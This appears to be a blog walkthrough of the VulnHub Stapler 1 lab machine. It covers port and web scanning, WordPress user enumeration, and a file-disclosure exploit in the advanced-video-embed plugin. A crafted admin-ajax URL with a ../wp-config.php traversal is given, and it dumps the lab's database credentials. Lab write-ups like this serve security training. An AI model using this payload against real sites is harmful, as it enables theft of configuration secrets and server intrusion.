tag:blogger.com,1999:blog-15443250787402920922024-03-13T06:27:30.272-07:00Secure BeliefAMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.comBlogger18125tag:blogger.com,1999:blog-1544325078740292092.post-58102637383653924532016-06-09T22:39:00.001-07:002016-06-09T22:39:34.059-07:00VulnHub Stapler 1 Solution 2<div dir="ltr" style="text-align: left;" trbidi="on">
You can find Solution 1 <a href="http://amolnaik4.blogspot.in/2016/06/vulnhub-stapler-1-solution.html">here</a>.<br />
<br />
After spending a night on this, I finally managed to solve the 2nd way to get limited shell on this box. Let's see how this is done.<br />
<br />
From nmap scan, we know there are to HTTP ports i.e. 80 & 12380.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">80/tcp open http syn-ack ttl 64</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">| http-methods: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|_ Supported Methods: GET HEAD POST OPTIONS</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|_http-title: 404 Not Found</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">12380/tcp open http syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">| http-methods: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|_ Supported Methods: GET HEAD POST OPTIONS</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|_http-server-header: Apache/2.4.18 (Ubuntu)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|_http-title: Tim, we need to-do better next year for Initech</span><br />
<br />
When accessed with browser, port 80 gives 404 for almost every request & port 12380 presents a static page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-hA0sr4m0m_s/V1pDZhENxoI/AAAAAAAABfs/K0_eQNpV9BwoEygXeWbcbxHB6EkBEm9dACLcB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B22-42-35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="252" src="https://4.bp.blogspot.com/-hA0sr4m0m_s/V1pDZhENxoI/AAAAAAAABfs/K0_eQNpV9BwoEygXeWbcbxHB6EkBEm9dACLcB/s640/Screenshot%2Bfrom%2B2016-06-09%2B22-42-35.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-Ij-kBMPgqik/V1pDaRdngJI/AAAAAAAABf0/LRDZ8APERowe38i-w0Zp5eZRlmk2bdQTACKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B22-43-56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="356" src="https://2.bp.blogspot.com/-Ij-kBMPgqik/V1pDaRdngJI/AAAAAAAABf0/LRDZ8APERowe38i-w0Zp5eZRlmk2bdQTACKgB/s640/Screenshot%2Bfrom%2B2016-06-09%2B22-43-56.png" width="640" /></a></div>
<br />
<br />
I ran nikto on both the ports.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~# nikto -h 192.168.1.3</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">- Nikto v2.1.6</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">---------------------------------------------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Target IP: 192.168.1.3</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Target Hostname: 192.168.1.3</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Target Port: 80</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Start Time: 2016-06-09 13:25:35 (GMT-4)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">---------------------------------------------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Server: No banner retrieved</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ The anti-clickjacking X-Frame-Options header is not present.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ No CGI Directories found (use '-C all' to force check all possible dirs)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ End Time: 2016-06-09 13:26:07 (GMT-4) (32 seconds)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">---------------------------------------------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ 1 host(s) tested</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~#</span><br />
<br />
This shows couple of files which look like from someone's home directory and mostly useless. Port 12380 shows few pointers.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~# nikto -h 192.168.1.3 -p 12380</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">- Nikto v2.1.6</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">---------------------------------------------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Target IP: 192.168.1.3</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Target Hostname: 192.168.1.3</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Target Port: 12380</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">---------------------------------------------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ <b>SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Ciphers: ECDHE-RSA-AES256-GCM-SHA384</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Start Time: 2016-06-09 13:26:33 (GMT-4)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">---------------------------------------------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Server: Apache/2.4.18 (Ubuntu)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ The anti-clickjacking X-Frame-Options header is not present.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ No CGI Directories found (use '-C all' to force check all possible dirs)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Entry '<b>/admin112233/</b>' in robots.txt returned a non-forbidden or redirect HTTP code (200)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Entry '<b>/blogblog/</b>' in robots.txt returned a non-forbidden or redirect HTTP code (200)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ "robots.txt" contains 2 entries which should be manually viewed.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Hostname '192.168.1.3' does not match certificate's names: Red.Initech</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ Uncommon header 'x-ob_mode' found, with contents: 1</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ OSVDB-3233: /icons/README: Apache default file found.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ <b>/phpmyadmin/: phpMyAdmin directory found</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ 7690 requests: 0 error(s) and 14 item(s) reported on remote host</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ End Time: 2016-06-09 13:38:40 (GMT-4) (727 seconds)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">---------------------------------------------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">+ 1 host(s) tested</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~#</span><br />
<br />
To my surprise, nikto shows that port 12380 runs on SSL which nmap couldn't able to detect. This was a huge success. Nikto was ablet to find 'robots.txt' and listed directories. Also it found 'phpMyAdmin'. The 'admin112233' directory plays a good prank with hardcoded javascript alert & redirection to http://www.xss-payloads.com/<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-vB8I_19Xd8o/V1pFanu6tWI/AAAAAAAABgE/Ypfr8Da9RqIEY6bJQ-vJpgn-OA87Qn9AwCKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B22-44-59.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="434" src="https://3.bp.blogspot.com/-vB8I_19Xd8o/V1pFanu6tWI/AAAAAAAABgE/Ypfr8Da9RqIEY6bJQ-vJpgn-OA87Qn9AwCKgB/s640/Screenshot%2Bfrom%2B2016-06-09%2B22-44-59.png" width="640" /></a></div>
<br />
<br />
The other directory 'blogblog' is wordpress installation which is internal company blog.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-xzWZ2IDOIm8/V1pFa5cW3TI/AAAAAAAABgI/Z82yjKp828MW5FkZB2zU28jNmsW_c6K2ACKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B22-46-04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="500" src="https://3.bp.blogspot.com/-xzWZ2IDOIm8/V1pFa5cW3TI/AAAAAAAABgI/Z82yjKp828MW5FkZB2zU28jNmsW_c6K2ACKgB/s640/Screenshot%2Bfrom%2B2016-06-09%2B22-46-04.png" width="640" /></a></div>
<br />
Next I ran 'WPScan' on this directory. The result was not having any vulnerability which could gain access to the server. WPScan detected wp_untrash_post_comments SQL Injection vulnerability, however this requires a post to be trashed by admin. This could be done as I managed to get into WordPress login with 'elly' account which was discovered in Solution 1. I left this as I thought this was not expected solution.<br />
<br />
There is another tool 'CMSmap' which enumerates CMS applications and gives good information.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">amolnaik@sandb0x:~/tools/CMSmap$ ./cmsmap.py -t https://192.168.1.3:12380/blogblog/</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[-] Date & Time: 10/06/2016 01:08:27</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[-] Target: https://192.168.1.3:12380/blogblog</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] Server: Apache/2.4.18 (Ubuntu)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[L] X-Frame-Options: Not Enforced</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] Strict-Transport-Security: Not Enforced</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] X-Content-Security-Policy: Not Enforced</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] X-Content-Type-Options: Not Enforced</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[L] No Robots.txt Found</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] CMS Detection: Wordpress</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] Wordpress Version: 4.2.1</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] Wordpress Theme: bhost</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[-] Enumerating Wordpress Usernames via "Feed" ...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[-] Enumerating Wordpress Usernames via "Author" ...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] John Smith</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] abby</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] asd</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] barry</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] dave</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] elly</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] garry</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] harry</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] heather</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] john</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] kathy</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] pam</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] peter</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] scott</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] simon</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] tim</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] vicki</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] zoe</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] Forgotten Password Allows Username Enumeration: https://192.168.1.3:12380/blogblog/wp-login.php?action=lostpassword</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[M] Website vulnerable to XML-RPC Brute Force Vulnerability</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] Autocomplete Off Not Found: https://192.168.1.3:12380/blogblog/wp-login.php</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[-] Default WordPress Files:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] https://192.168.1.3:12380/blogblog/readme.html</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] https://192.168.1.3:12380/blogblog/license.txt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] https://192.168.1.3:12380/blogblog/wp-includes/images/crystal/license.txt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] https://192.168.1.3:12380/blogblog/wp-includes/images/crystal/license.txt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] https://192.168.1.3:12380/blogblog/wp-includes/js/plupload/license.txt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] https://192.168.1.3:12380/blogblog/wp-includes/js/tinymce/license.txt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] https://192.168.1.3:12380/blogblog/wp-includes/js/swfupload/license.txt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] https://192.168.1.3:12380/blogblog/wp-includes/ID3/license.txt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] https://192.168.1.3:12380/blogblog/wp-includes/ID3/readme.txt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] https://192.168.1.3:12380/blogblog/wp-includes/ID3/license.commercial.txt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[-] Searching Wordpress Plugins ...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] akismet</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[-] Searching Wordpress TimThumbs ...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[I] Checking for Directory Listing Enabled ...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[L] <b>https://192.168.1.3:12380/blogblog/wp-content/</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[L] <b>https://192.168.1.3:12380/blogblog/wp-includes/</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[-] Date & Time: 10/06/2016 01:13:25</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[-] Completed in: 0:04:57</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">amolnaik@sandb0x:~/tools/CMSmap$</span><br />
<br />
CMSmap found directory listing enabled for /wp-content/ & /wp-includes/.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-sef1o2-6fxA/V1pFblrp3UI/AAAAAAAABhU/N0CPE_EQffQtdLyFAM40PI7_9uEBVeDQQCKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B22-47-35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="436" src="https://3.bp.blogspot.com/-sef1o2-6fxA/V1pFblrp3UI/AAAAAAAABhU/N0CPE_EQffQtdLyFAM40PI7_9uEBVeDQQCKgB/s640/Screenshot%2Bfrom%2B2016-06-09%2B22-47-35.png" width="640" /></a></div>
The 'wp-content' directory has plugins and wordpress is known to have serious vulnerabilities in plugins.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-RvzAgaWGn-o/V1pFcNWLzgI/AAAAAAAABhU/EVtyA4MKRIMSY23SboZNtei4M23K6ms5gCKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B22-48-02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="349" src="https://1.bp.blogspot.com/-RvzAgaWGn-o/V1pFcNWLzgI/AAAAAAAABhU/EVtyA4MKRIMSY23SboZNtei4M23K6ms5gCKgB/s640/Screenshot%2Bfrom%2B2016-06-09%2B22-48-02.png" width="640" /></a></div>
I picked up 'advanced-video-embed' plugin to investigate.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-VGbQ_oi0K9M/V1pFcLUbqqI/AAAAAAAABhU/VI8XwXNHlTAmstEmIsgsOYVh07nzgZqfgCKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B22-48-55.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="204" src="https://3.bp.blogspot.com/-VGbQ_oi0K9M/V1pFcLUbqqI/AAAAAAAABhU/VI8XwXNHlTAmstEmIsgsOYVh07nzgZqfgCKgB/s640/Screenshot%2Bfrom%2B2016-06-09%2B22-48-55.png" width="640" /></a></div>
<br />
This plugin has Version 1.0 and is vulnerable to File Disclosure vulenerability. Exploit-db has exploit for this:<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><a href="https://www.exploit-db.com/exploits/39646/">https://www.exploit-db.com/exploits/39646/</a></span><br />
<br />
The exploit code didn't work as the target site was having invalid certificate. So I decided to do it manually. After reading the code, I crafted below URL to fetch 'wp-config.php' file which is configuration file for WordPress.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">https://192.168.1.3:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php</span><br />
<br />
This gives me below response.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-lfuruOkG19w/V1pFccog4RI/AAAAAAAABhU/KWcf807VQOIzfG_5XzJ1A-FJe1Gs4sLOgCKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B22-51-57.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://4.bp.blogspot.com/-lfuruOkG19w/V1pFccog4RI/AAAAAAAABhU/KWcf807VQOIzfG_5XzJ1A-FJe1Gs4sLOgCKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B22-51-57.png" /></a></div>
When accessed the main site, there was a new post with 'random' title.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-fo1lGwjL5DU/V1pFdOGJ1-I/AAAAAAAABhU/kQJ9bUd7DZUaeQALpFTGcVTn-vQ_kEJGgCKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B22-52-30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="386" src="https://3.bp.blogspot.com/-fo1lGwjL5DU/V1pFdOGJ1-I/AAAAAAAABhU/kQJ9bUd7DZUaeQALpFTGcVTn-vQ_kEJGgCKgB/s640/Screenshot%2Bfrom%2B2016-06-09%2B22-52-30.png" width="640" /></a></div>
<br />
Notice '1829704549.jpeg' on top of the title 'random'. This has a link to actual location of the file in source.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-j08dTx6J8y8/V1pFdCjDscI/AAAAAAAABhU/-ULiATTdo68639b4I6DjPPM34ydddXF3QCKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B22-53-28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="154" src="https://3.bp.blogspot.com/-j08dTx6J8y8/V1pFdCjDscI/AAAAAAAABhU/-ULiATTdo68639b4I6DjPPM34ydddXF3QCKgB/s640/Screenshot%2Bfrom%2B2016-06-09%2B22-53-28.png" width="640" /></a></div>
<br />
Basically this exploit creates a file in /wp-content/uploads/ directory with jpeg extension, however this is not a valid JPEG file, it's text with the content of request file, in this context wp-config.php<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# wget --no-check-certificate https://192.168.1.3:12380/blogblog/wp-content/uploads/1829704549.jpeg</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">--2016-06-09 22:54:09-- https://192.168.1.3:12380/blogblog/wp-content/uploads/1829704549.jpeg</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Connecting to 192.168.1.3:12380... connected.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">WARNING: The certificate of ‘192.168.1.3’ is not trusted.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">WARNING: The certificate of ‘192.168.1.3’ hasn't got a known issuer.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">The certificate's owner does not match hostname ‘192.168.1.3’</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">HTTP request sent, awaiting response... 200 OK</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Length: 3042 (3.0K) [image/jpeg]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Saving to: ‘1829704549.jpeg’</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">1829704549.jpeg 100%[===================>] 2.97K --.-KB/s in 0s </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2016-06-09 22:54:09 (55.9 MB/s) - ‘1829704549.jpeg’ saved [3042/3042]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# file 1829704549.jpeg</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">1829704549.jpeg: PHP script, ASCII text</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# cat 1829704549.jpeg</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><?php</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/**</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * The base configurations of the WordPress.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> *</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * This file has the following configurations: MySQL settings, Table Prefix,</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * Secret Keys, and ABSPATH. You can find more information by visiting</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * Codex page. You can get the MySQL settings from your web host.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> *</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * This file is used by the wp-config.php creation script during the</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * installation. You don't have to use the web site, you can just copy this file</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * to "wp-config.php" and fill in the values.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> *</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * @package WordPress</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> */</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">// ** MySQL settings - You can get this info from your web host ** //</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/** The name of the database for WordPress */</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('DB_NAME', 'wordpress');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>/** MySQL database username */</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>define('DB_USER', 'root');</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>/** MySQL database password */</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>define('DB_PASSWORD', 'plbkac');</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/** MySQL hostname */</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('DB_HOST', 'localhost');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/** Database Charset to use in creating database tables. */</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('DB_CHARSET', 'utf8mb4');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/** The Database Collate type. Don't change this if in doubt. */</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('DB_COLLATE', '');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/**#@+</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * Authentication Unique Keys and Salts.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> *</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * Change these to different unique phrases!</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> *</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * @since 2.6.0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> */</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('AUTH_KEY', 'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');</span><br />
